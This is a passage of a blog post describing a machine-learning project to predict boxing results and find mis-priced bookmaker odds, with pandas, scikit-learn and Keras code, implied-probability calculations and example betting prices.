/static/422a5853b0ce018adab8a13a8a44fc3b/1c72d/twitter.jpg 590w,
/static/422a5853b0ce018adab8a13a8a44fc3b/a8a14/twitter.jpg 885w,
/static/422a5853b0ce018adab8a13a8a44fc3b/47311/twitter.jpg 1080w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;While ‘next manager’ markets are a difficult problem to solve with machine learning, boxing is less so. A boxing match involves only two people (although coaches, promoters and cornermen are statistically significant), follows fixed rules and has a plethora of data available.&lt;/p&gt;
&lt;h2&gt;The Data&lt;/h2&gt;
&lt;p&gt;The dataset contained over 2 million fights, with boxers in every weight class hailing from every corner of the world. Before any feature engineering there were 28 variables to work with, including date of birth, date of debut, venue, stance and world ranking. However, some data was missing.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;# Remove exact duplicate rows
df.drop_duplicates(inplace=True)

# Count the missing values in every column that has at least one
null_columns = df.columns[df.isnull().any()]
df[null_columns].isnull().sum()&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;kopercentage                 382 
height                     60958 
draws                          4 
opponentwins                 433 
winmethod                   1590 
townofbirth                 2948 
worldrankingbyweight        6414 
reach                     117795 
opponentlosses             15365 
losses                         4 
opponentdraw               15365 
countryrankingbyweight      7301&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Height and reach were the features with the most missing data. A person’s arm span (a boxer’s reach) is typically almost identical to their height, so it was possible to fill in the data where a boxer had only one of the two variables available.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;df[&amp;#39;reach&amp;#39;] = df[&amp;#39;reach&amp;#39;].fillna(df[&amp;#39;height&amp;#39;])
df[&amp;#39;height&amp;#39;] = df[&amp;#39;height&amp;#39;].fillna(df[&amp;#39;reach&amp;#39;])&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the other features with a significant amount of missing data, gaps were filled with averages taken across weight classes.&lt;/p&gt;
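&lt;p&gt;Weight-class averaging can be expressed as a pandas group-wise transform. This sketch assumes that the weight class is stored in the &lt;code class=&quot;language-text&quot;&gt;division&lt;/code&gt; column and that the columns being filled are numeric. The helper name and the example rows are hypothetical and made up.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import pandas as pd


def fill_with_division_mean(df, columns, group_col='division'):
    """Replace missing values in `columns` with that column's mean
    within the same weight class (group_col). Returns a new dataframe."""
    df = df.copy()
    for col in columns:
        # Mean per weight class, broadcast back to every row (NaNs are ignored)
        division_mean = df.groupby(group_col)[col].transform('mean')
        df[col] = df[col].fillna(division_mean)
    return df


# Hypothetical example with made-up values
example = pd.DataFrame({
    'division': ['heavyweight', 'heavyweight', 'flyweight', 'flyweight'],
    'kopercentage': [70.0, None, 30.0, 40.0],
})
filled = fill_with_division_mean(example, ['kopercentage'])
print(filled['kopercentage'].tolist())  # [70.0, 70.0, 30.0, 40.0]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;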
&lt;p&gt;Once the data had been cleaned, it was also necessary to ‘self-join’ the dataframe. Each record in the dataset represented one half of a fight. There would be a Boxer 1 and a Boxer 2. The target for each row would be Win, Lose, or Draw, with respect to Boxer 1. However, elsewhere in the dataset there would be a record for the same fight but with respect to the opponent. Duplicating the dataset, removing or renaming unnecessary columns and merging the two datasets back together allowed for a richer dataset without any repeated entries.&lt;/p&gt;
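&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;# Take an explicit copy so the opponent-side columns can be dropped and renamed independently of df
df2 = df.copy()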

df2 = df2.drop([&amp;#39;boxerwin&amp;#39;, &amp;#39;winmethod&amp;#39;, &amp;#39;countryoffight&amp;#39;, &amp;#39;roundspath&amp;#39;, &amp;#39;division&amp;#39;, &amp;#39;sex&amp;#39;, &amp;#39;opponentwins&amp;#39;, &amp;#39;opponentlosses&amp;#39;, &amp;#39;opponentdraw&amp;#39;, &amp;#39;wins&amp;#39;, &amp;#39;losses&amp;#39;, &amp;#39;draws&amp;#39;, &amp;#39;totalboxersindivision&amp;#39;, &amp;#39;roundsinfight&amp;#39;], axis=1) 

df2.columns = (&amp;#39;opponentkopercentage&amp;#39;, &amp;#39;opponentdebut&amp;#39;, &amp;#39;opponentboxrecrating&amp;#39;, &amp;#39;opponentheight&amp;#39;, &amp;#39;opponentrounds&amp;#39;, &amp;#39;opponentform&amp;#39;, &amp;#39;opponenttownofbirth&amp;#39;, &amp;#39;opponentworldrankingbyweight&amp;#39;, &amp;#39;name&amp;#39;, &amp;#39;opponentstance&amp;#39;, &amp;#39;opponentreach&amp;#39;, &amp;#39;opponentbouts&amp;#39;, &amp;#39;opponentcountryofbirth&amp;#39;, &amp;#39;opponent&amp;#39;, &amp;#39;opponentdob&amp;#39;, &amp;#39;venue&amp;#39;, &amp;#39;opponentcountryrankingbyweight&amp;#39;, &amp;#39;opponenttotalboxersindivisionandcountry&amp;#39; ) 

df3 = pd.merge(df, df2, on=[&amp;#39;opponent&amp;#39;, &amp;#39;name&amp;#39;, &amp;#39;venue&amp;#39;])&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
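&lt;p&gt;The self-join idea is easier to see on a toy example. This sketch uses a handful of hypothetical columns and two made-up rows rather than the real schema. Each fight appears twice, once per boxer. Swapping the name and opponent columns in a copy, and prefixing that copy’s boxer-specific columns, lets both halves be merged into one row.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import pandas as pd

# Two half-records for the same (made-up) fight, one from each boxer's side
fights = pd.DataFrame({
    'name': ['Boxer A', 'Boxer B'],
    'opponent': ['Boxer B', 'Boxer A'],
    'venue': ['Arena X', 'Arena X'],
    'height': [190, 185],
    'boxerwin': ['W', 'L'],
})

# Opponent view: swap name/opponent and rename the boxer-specific column
opponent_view = fights[['name', 'opponent', 'venue', 'height']].rename(columns={
    'name': 'opponent',
    'opponent': 'name',
    'height': 'opponentheight',
})

# Each row now gains the opponent's attributes for the same fight
merged = pd.merge(fights, opponent_view, on=['name', 'opponent', 'venue'])
print(merged[['name', 'opponent', 'height', 'opponentheight', 'boxerwin']])&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Each output row carries both boxers’ heights, which is what makes difference features such as the ones below possible.&lt;/p&gt;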
&lt;h3&gt;Feature Engineering&lt;/h3&gt;
&lt;p&gt;Feature engineering is the process of using domain knowledge to create features that improve the performance of machine learning algorithms. In this instance, that meant creating comparisons between the two fighters that the model might not infer automatically during training. The new features I created included the difference in height, the difference in reach and the difference in win records. Intuitively, we know that home advantage is important in sports, so I also added a binary feature indicating whether the venue was in either boxer’s country of birth.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;# height difference
df3[&amp;#39;Diff_height&amp;#39;] = df3.height - df3.opponentheight

#reach difference
df3[&amp;#39;Diff_reach&amp;#39;] = df3.reach - df3.opponentreach

#name experience
df3[&amp;#39;name_experience&amp;#39;] = df3.bouts - df3.opponentbouts

#opponent experience
df3[&amp;#39;opponent_experience&amp;#39;] = df3.opponentbouts - df3.bouts

#name_win_pc
df3[&amp;#39;name_win_pc&amp;#39;] = df3.wins / df3.bouts
df3.loc[df3.bouts == 0, &amp;#39;name_win_pc&amp;#39;] = 0
 
#opponent_win_pc
df3[&amp;#39;opponent_win_pc&amp;#39;] = df3.opponentwins / df3.opponentbouts
df3.loc[df3.opponentbouts == 0, &amp;#39;opponent_win_pc&amp;#39;] = 0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
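&lt;p&gt;The home-advantage flag isn’t included in the code above, so here is a minimal sketch. It assumes the merged dataframe has a &lt;code class=&quot;language-text&quot;&gt;countryoffight&lt;/code&gt; column, which is dropped only from the opponent copy and so survives in df3. It also assumes &lt;code class=&quot;language-text&quot;&gt;countryofbirth&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;opponentcountryofbirth&lt;/code&gt; columns. These names are inferred rather than confirmed, and the example rows are made up.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import pandas as pd


def add_home_advantage(df3):
    """Add a binary home_advantage column: 1 if the fight took place in
    either boxer's country of birth, else 0 (assumed column names)."""
    df3 = df3.copy()
    at_home = df3['countryoffight'] == df3['countryofbirth']
    opponent_at_home = df3['countryoffight'] == df3['opponentcountryofbirth']
    df3['home_advantage'] = (at_home | opponent_at_home).astype(int)
    return df3


# Made-up rows for illustration
example = pd.DataFrame({
    'countryoffight': ['Bulgaria', 'USA'],
    'countryofbirth': ['Bulgaria', 'UK'],
    'opponentcountryofbirth': ['UK', 'Mexico'],
})
print(add_home_advantage(example)['home_advantage'].tolist())  # [1, 0]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As described, the flag is symmetric, so it doesn’t say which boxer is at home. An asymmetric variant with one flag per boxer would let the model tell who holds the advantage.&lt;/p&gt;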
&lt;p&gt;The final step before feeding the data into a model was to one-hot encode all of the categorical variables. This is necessary because machine learning models operate on numbers rather than text. One-hot encoding turns each category into its own binary column: every row contains zeroes except in the column for its own category, which is marked with a 1. Because most entries are zero, the result is a sparse matrix.&lt;/p&gt;
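&lt;p&gt;In pandas, one-hot encoding is commonly done with &lt;code class=&quot;language-text&quot;&gt;pd.get_dummies&lt;/code&gt;. The sketch below encodes a &lt;code class=&quot;language-text&quot;&gt;stance&lt;/code&gt; column. The column name comes from the variable list above, but the values are made up.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import pandas as pd

fights = pd.DataFrame({'stance': ['orthodox', 'southpaw', 'orthodox']})

# One binary column per category; each row has a 1 only in its own category's column
encoded = pd.get_dummies(fights, columns=['stance'], dtype=int)
print(encoded.columns.tolist())  # ['stance_orthodox', 'stance_southpaw']
print(encoded.values.tolist())   # [[1, 0], [0, 1], [1, 0]]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;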
&lt;h3&gt;Feature Importance&lt;/h3&gt;
&lt;p&gt;Before building a neural network, I trained a random forest model to calculate the importance of each feature in my dataset. A feature importance chart provides a score that indicates how valuable a feature was in the construction of the decision trees within the model. The more a feature is used to make key decisions within the decision trees, the higher its relative importance.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import pandas as pd
from sklearn.ensemble import RandomForestClassifier

# Classifiers to compare: a default forest and a tuned forest
classifiers = [
    RandomForestClassifier(),
    RandomForestClassifier(bootstrap=True, class_weight=None, criterion=&amp;#39;gini&amp;#39;,
            max_depth=17, max_features=6, max_leaf_nodes=None,
            min_impurity_decrease=0.0,
            min_samples_leaf=1, min_samples_split=2,
            min_weight_fraction_leaf=0.0, n_estimators=70, n_jobs=1,
            oob_score=False, random_state=None, verbose=0,
            warm_start=True),
]

for item in classifiers:
    classifier_name = type(item).__name__
    print(classifier_name)

    # Create classifier, train it and test it.
    clf = item
    clf.fit(feature_train, label_train)
    score = clf.score(feature_test, label_test)
    print(round(score, 3), &amp;quot;\n&amp;quot;, &amp;quot;- - - - - &amp;quot;, &amp;quot;\n&amp;quot;)

# Feature importances from the last classifier trained (the tuned forest)
importance_df = pd.DataFrame()
importance_df[&amp;#39;feature&amp;#39;] = X2.columns
importance_df[&amp;#39;importance&amp;#39;] = clf.feature_importances_

importance_df = importance_df.sort_values(&amp;#39;importance&amp;#39;, ascending=False)
importance_df.set_index(keys=&amp;#39;feature&amp;#39;).sort_values(by=&amp;#39;importance&amp;#39;, ascending=True).plot(kind=&amp;#39;barh&amp;#39;, figsize=(200, 150))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Zoomed out, you can see all the features and their importance relative to each other. The top features were:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Difference in World Ranking&lt;/li&gt;
&lt;li&gt;Difference in Win %&lt;/li&gt;
&lt;li&gt;KO %&lt;/li&gt;
&lt;li&gt;The total number of rounds a boxer has fought in&lt;/li&gt;
&lt;li&gt;Age difference&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/105c1de80be5e11b1e0a6d6b7cce8af5/72e01/importance.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 73.64864864864865%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAPABQDASIAAhEBAxEB/8QAGAAAAgMAAAAAAAAAAAAAAAAAAAQBAgX/xAAUAQEAAAAAAAAAAAAAAAAAAAAC/9oADAMBAAIQAxAAAAFx5TQYgsB//8QAGhAAAgIDAAAAAAAAAAAAAAAAAQIAAxARIf/aAAgBAQABBQKIgA1K+vj/xAAVEQEBAAAAAAAAAAAAAAAAAAACEP/aAAgBAwEBPwEz/8QAFREBAQAAAAAAAAAAAAAAAAAAAhD/2gAIAQIBAT8BU//EABUQAQEAAAAAAAAAAAAAAAAAABAB/9oACAEBAAY/AmP/xAAcEAACAQUBAAAAAAAAAAAAAAAAEQEQIVFh8PH/2gAIAQEAAT8hXMuqHOxMQeBX/9oADAMBAAIAAwAAABCzD//EABYRAAMAAAAAAAAAAAAAAAAAAAEQQf/aAAgBAwEBPxAKv//EABYRAAMAAAAAAAAAAAAAAAAAAAEQQf/aAAgBAgEBPxAov//EABwQAQACAgMBAAAAAAAAAAAAAAEAESExEHGB0f/aAAgBAQABPxASgCroIA1Ll2rqU/KAGJhvxz//2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Chart&quot;
        title=&quot;Chart&quot;
        src=&quot;/static/105c1de80be5e11b1e0a6d6b7cce8af5/1c72d/importance.jpg&quot;
        srcset=&quot;/static/105c1de80be5e11b1e0a6d6b7cce8af5/a80bd/importance.jpg 148w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/1c91a/importance.jpg 295w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/1c72d/importance.jpg 590w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/a8a14/importance.jpg 885w,
/static/105c1de80be5e11b1e0a6d6b7cce8af5/72e01/importance.jpg 1024w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;When choosing which features to include in a deep learning model, I was hoping to find a strong inflection point in the importance scores, which unfortunately wasn’t there. However, you can infer relative importance by comparing all the features against a variable you know shouldn’t be statistically important. Draws are relatively rare in boxing, so the ‘draw’ feature shouldn’t be a high-value feature in a decision tree. It can therefore serve as a yardstick, and features can be picked for the deep learning model according to whether they score above it.&lt;/p&gt;
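&lt;p&gt;The yardstick approach amounts to keeping every feature that scores above the draw feature. This sketch assumes an importance table shaped like importance_df above. It also assumes the draw count is stored in the &lt;code class=&quot;language-text&quot;&gt;draws&lt;/code&gt; column, as in the missing-values output. The importance values in the example are illustrative only, not the model’s real scores.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;import pandas as pd


def select_above_yardstick(importance_df, yardstick='draws'):
    """Return the features whose importance exceeds that of the yardstick
    feature, ordered from most to least important."""
    scores = importance_df.set_index('feature')['importance']
    threshold = scores[yardstick]
    selected = scores[scores > threshold].sort_values(ascending=False)
    return selected.index.tolist()


# Illustrative importances only (not the real model's values)
example = pd.DataFrame({
    'feature': ['name_win_pc', 'kopercentage', 'draws', 'Diff_reach'],
    'importance': [0.30, 0.20, 0.05, 0.01],
})
print(select_above_yardstick(example))  # ['name_win_pc', 'kopercentage']&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;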
&lt;h2&gt;Neural Network&lt;/h2&gt;
&lt;p&gt;Using a relatively simple network architecture, I was able to achieve an accuracy of 92% on the validation data with an 80:20 split. Further experimentation could include more complex architectures, dropout and batch normalisation, but I was keen to use my model on future bouts.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;from keras.models import Sequential
from keras.layers import Dense

classifier = Sequential()

# First hidden layer (6 units), fed by the 40 input features
classifier.add(Dense(units=6, kernel_initializer=&amp;#39;uniform&amp;#39;, activation=&amp;#39;relu&amp;#39;, input_dim=40))

classifier.add(Dense(units=10, kernel_initializer=&amp;#39;uniform&amp;#39;, activation=&amp;#39;relu&amp;#39;))

classifier.add(Dense(units=10, kernel_initializer=&amp;#39;uniform&amp;#39;, activation=&amp;#39;relu&amp;#39;))

# Single sigmoid output: the probability that the boxer wins
classifier.add(Dense(units=1, kernel_initializer=&amp;#39;uniform&amp;#39;, activation=&amp;#39;sigmoid&amp;#39;))&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Epoch 146/150
50886/50886 [==============================] - 31s 610us/step - loss: 0.1903 - acc: 0.9257
Epoch 147/150
50886/50886 [==============================] - 30s 581us/step - loss: 0.1902 - acc: 0.9259
Epoch 148/150
50886/50886 [==============================] - 30s 597us/step - loss: 0.1903 - acc: 0.9257
Epoch 149/150
50886/50886 [==============================] - 30s 580us/step - loss: 0.1901 - acc: 0.9253
Epoch 150/150
50886/50886 [==============================] - 28s 560us/step - loss: 0.1905 - acc: 0.9251&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I trained the neural network twice: once to predict whether or not a boxer would win, and a second time to predict the round in which the boxer would win. The prices offered for picking the correct round are far better (often as high as 16/1) than those for wagering on a simple win or loss. The round-betting model achieved an accuracy of 17%. While this accuracy is poor, if you can afford to lose 83 times out of 100 but receive a 5-16x return on successful bets, this may be a project worthy of further research.&lt;/p&gt;
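&lt;p&gt;The trade-off can be made concrete with expected value. This back-of-the-envelope sketch assumes that the 17% accuracy applies equally to every round bet placed. It also reads the ‘5-16x return’ as fractional odds between 5/1 and 16/1. In reality, both accuracy and prices vary by round.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;def expected_profit(p_win, numerator, denominator, stake=1.0):
    """Expected profit of a bet at fractional odds numerator/denominator,
    given a probability p_win that the bet wins."""
    profit_if_win = stake * numerator / denominator
    return p_win * profit_if_win - (1 - p_win) * stake


def break_even_odds(p_win):
    """Fractional odds (x/1) at which expected profit is zero: (1 - p) / p."""
    return (1 - p_win) / p_win


p = 0.17  # round-betting accuracy quoted above
for num in (5, 8, 16):
    print(f'{num}/1: expected profit per unit staked = {expected_profit(p, num, 1):+.2f}')
print(f'break-even odds = {break_even_odds(p):.2f}/1')&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;At 17%, the break-even price is roughly 4.9/1. A 5/1 bet is therefore only just profitable in expectation (about +0.02 per unit staked), while 16/1 returns about +1.89 per unit staked.&lt;/p&gt;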
&lt;h2&gt;Predictions&lt;/h2&gt;
&lt;p&gt;The output of the ‘win’ neural network was a decimal between 0 and 1. A score close to 0 indicated that the boxer in question had a low chance of winning; a score close to 1 indicated a high chance of winning.&lt;/p&gt;
&lt;p&gt;While you might consider this prediction enough to start placing your own bets, it is important first to compare the confidence of your prediction with the implied probability offered by the bookmaker. Implied probabilities from fractional odds (the most common way of representing odds in the UK) are calculated using the following equation.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;denominator / (denominator + numerator) * 100&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
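&lt;p&gt;The same equation as a small Python function, applied to prices mentioned in this post, is shown below. Bookmakers build a margin into their prices, so the implied probabilities across all outcomes of a market typically add up to more than 100%.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;def implied_probability(numerator, denominator):
    """Implied probability (as a percentage) of fractional odds numerator/denominator."""
    return denominator / (denominator + numerator) * 100


# Prices mentioned in this post
for num, den in [(33, 1), (9, 1), (4, 8)]:
    print(f'{num}/{den}: {implied_probability(num, den):.1f}%')&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The Jokanović price moving from 33/1 to 9/1 corresponds to an implied probability rising from about 2.9% to 10%. The 4/8 quoted for Pulev implies roughly 66.7%.&lt;/p&gt;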
&lt;p&gt;Once you have a probability from your model and an implied probability from the bookmaker, you can set a decision threshold. Ideally, you would refine this threshold by gathering large quantities of historical odds and comparing them with your model’s predictions and then with the actual outcomes.&lt;/p&gt;
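&lt;p&gt;One simple form of decision rule is to bet only when the model’s probability exceeds the bookmaker’s implied probability by some margin (the ‘edge’). The sketch below is a hypothetical rule, not necessarily the one used in this project. The 0.10 threshold is an arbitrary placeholder that would be tuned on historical odds and outcomes as described above.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;def implied_prob(numerator, denominator):
    """Implied probability (between 0 and 1) of fractional odds numerator/denominator."""
    return denominator / (denominator + numerator)


def should_bet(model_prob, numerator, denominator, min_edge=0.10):
    """Return (decision, edge): bet only if the model's win probability beats
    the implied probability by at least min_edge (a hypothetical threshold)."""
    edge = model_prob - implied_prob(numerator, denominator)
    return edge >= min_edge, edge


# Pulev vs Fury figures quoted later in this post: model 93%, odds 4/8
bet, edge = should_bet(0.93, 4, 8)
print(bet, round(edge, 3))  # True 0.263&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;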
&lt;p&gt;In practice, this model favoured betting on clear favourites, where the return on investment for an individual bet was less than 10%. A consistent 6-7% return could have been achieved through automation, but this was less interesting than scanning the book for ‘unicorn’ bets, where the offered odds were significantly mis-priced.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/6f5896f55c1de016d2219ce1e8f4c368/0f98f/pulev.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62.83783783783784%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAGAAAAwEBAAAAAAAAAAAAAAAAAAIEAwX/xAAXAQADAQAAAAAAAAAAAAAAAAAAAQID/9oADAMBAAIQAxAAAAHnpTgUhQPP/8QAGhABAQACAwAAAAAAAAAAAAAAAQIDEQAEEv/aAAgBAQABBQKQJCeWeKnSYNOXshOX/8QAFhEBAQEAAAAAAAAAAAAAAAAAAhAR/9oACAEDAQE/AUcn/8QAFREBAQAAAAAAAAAAAAAAAAAAARD/2gAIAQIBAT8BJ//EABkQAAMBAQEAAAAAAAAAAAAAAAABESECUf/aAAgBAQAGPwLdMbITpHKhPEf/xAAbEAEAAwADAQAAAAAAAAAAAAABABEhMUFhUf/aAAgBAQABPyHTTHHsS6PEj2G+xIT3DxqX5lfszOwOWf/aAAwDAQACAAMAAAAQUO//xAAXEQEBAQEAAAAAAAAAAAAAAAABABEh/9oACAEDAQE/EEYJOby//8QAFxEAAwEAAAAAAAAAAAAAAAAAAAERIf/aAAgBAgEBPxBrRPNP/8QAGxABAQACAwEAAAAAAAAAAAAAAREAITFBUaH/2gAIAQEAAT8QXpi2xIjUc3oepftyKhQ4BHKkY4SNay/FA7+OLiyApZLNT3P/2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pulev&quot;
        title=&quot;Pulev&quot;
        src=&quot;/static/6f5896f55c1de016d2219ce1e8f4c368/1c72d/pulev.jpg&quot;
        srcset=&quot;/static/6f5896f55c1de016d2219ce1e8f4c368/a80bd/pulev.jpg 148w,
/static/6f5896f55c1de016d2219ce1e8f4c368/1c91a/pulev.jpg 295w,
/static/6f5896f55c1de016d2219ce1e8f4c368/1c72d/pulev.jpg 590w,
/static/6f5896f55c1de016d2219ce1e8f4c368/a8a14/pulev.jpg 885w,
/static/6f5896f55c1de016d2219ce1e8f4c368/fbd2c/pulev.jpg 1180w,
/static/6f5896f55c1de016d2219ce1e8f4c368/0f98f/pulev.jpg 1920w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This happened in the bout between Hughie Fury and Kubrat Pulev in October 2018. Kubrat Pulev was a higher ranked boxer fighting on home turf in Sofia, Bulgaria. However, in British betting markets there was significant market sentiment in favour of Hughie Fury.&lt;/p&gt;
&lt;p&gt;The machine learning model estimated the probability of Kubrat Pulev winning the fight at 93%. The bookmakers’ odds implied that he was only a moderate favourite, at around 66%, meaning I could place a high-confidence bet at odds of 4/8.&lt;/p&gt;
&lt;p&gt;The takeaway from this project is that it is possible to engineer a small advantage over the bookmakers using machine learning. As the barriers to entry for learning about artificial intelligence are lowered, this is something that is available to more people every day.&lt;/p&gt;
&lt;p&gt;With extra time and automation, it may be possible to get a moderate return on investment at a level of risk you can control by adjusting your thresholds for placing bets.&lt;/p&gt;
&lt;p&gt;For those of you who are more casual bettors, machine learning can be used to try to identify mis-priced bets. While I haven’t done any further research, I think mis-pricing across international betting markets would be an interesting area to explore.&lt;/p&gt;
&lt;p&gt;I will leave you with the odds offered on each round for Anthony Joshua to beat Joseph Parker in the UK…&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Joshua to win in round 1    14/1
Joshua to win in round 2    10/1
Joshua to win in round 3    8/1
Joshua to win in round 4    8/1
Joshua to win in round 5    8/1
Joshua to win in round 6    8/1
Joshua to win in round 7    8/1
Joshua to win in round 8    9/1
Joshua to win in round 9    12/1
Joshua to win in round 10   14/1
Joshua to win in round 11   16/1
Joshua to win in round 12   20/1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;and New Zealand…&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Joshua to win in round 1    17/1
Joshua to win in round 2    15/1
Joshua to win in round 3    12/1
Joshua to win in round 4    12/1
Joshua to win in round 5    10/1
